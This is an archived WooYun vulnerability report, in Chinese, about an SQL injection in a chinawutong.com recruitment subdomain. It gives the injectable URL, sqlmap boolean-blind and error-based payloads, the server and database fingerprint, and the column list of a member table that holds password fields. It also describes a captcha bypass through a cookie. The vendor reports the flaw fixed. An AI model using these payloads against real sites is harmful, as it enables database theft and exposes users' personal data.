乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-15: 细节已通知厂商并且等待厂商处理中 2015-12-15: 厂商已经确认,细节仅向厂商公开 2015-12-25: 细节向核心白帽子及相关领域专家公开 2016-01-04: 厂商已经修复漏洞并主动公开,细节向公众公开
中国物通分站SQL注入一处,可以获取大量用户的个人信息。
注入点:http://hr.chinawutong.com/qiuzhi/p1/?p=0%27&pv=
hr.chinawutong.com/qiuzhi/p1/?p=0 and email=1&pv=
使用sqlmap跑出当前用户,库名,表名等信息。可以直接脱裤,但由于速度慢的关系没有进一步测试:
Place: GETParameter: p Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: p=0 AND 1958=1958&pv= Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: p=0 AND 746=CONVERT(INT,(CHAR(58)+CHAR(120)+CHAR(115)+CHAR(99)+CHAR(58)+(SELECT (CASE WHEN (746=746) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(112)+CHAR(99)+CHAR(99)+CHAR(58)))&pv=---[15:39:03] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008Database: wutongTable: dbo.huiyuan[50 columns]+-----------------+----------+| Column | Type |+-----------------+----------+| beiannum | bit || ChengxinState | bit || cishu | bit || CloseVipmidTime | bit || CloseVipTime | bit || co | bit || CurrentPosition | bit || cust_kind | bit || cust_name | bit || cust_pass | bit || domain | bit || email | bit || GpsLoginNum | bit || id | bit || ipviptime | bit || Ispromoter | bit || Issample | bit || logintime | bit || num | bit || OpenID | bit || OpenVipmidTime | bit || OpenVipTime | bit || pass_answer | bit || pass_note | bit || price | bit || Recommend | bit || Recommend1 | bit || score | bit || scoreGive | bit || SoftNum | bit || stylename | bit || time | bit || truename | bit || url | bit || Verify | bit || vip | bit || vipmid | bit || VLevel | bit || vnum | bit || vtype | bit || vyear | bit || wanshanRen | bit || WapNum | bit || WebSite | bit || WebSite1 | bit || WXTNumber | bit || yuangong | bit || zcrtel | bit || zhuangtai | bit || zhuceren | nvarchar |+-----------------+----------+
附赠一个设计缺陷:验证码存在了cookie,只是前段验证了一下,可以直接绕过验证码。
可参考详细说明
你们有这方面的经验的
危害等级:高
漏洞Rank:15
确认时间:2015-12-15 17:18
感谢反馈
2016-01-04:感谢反馈 已修复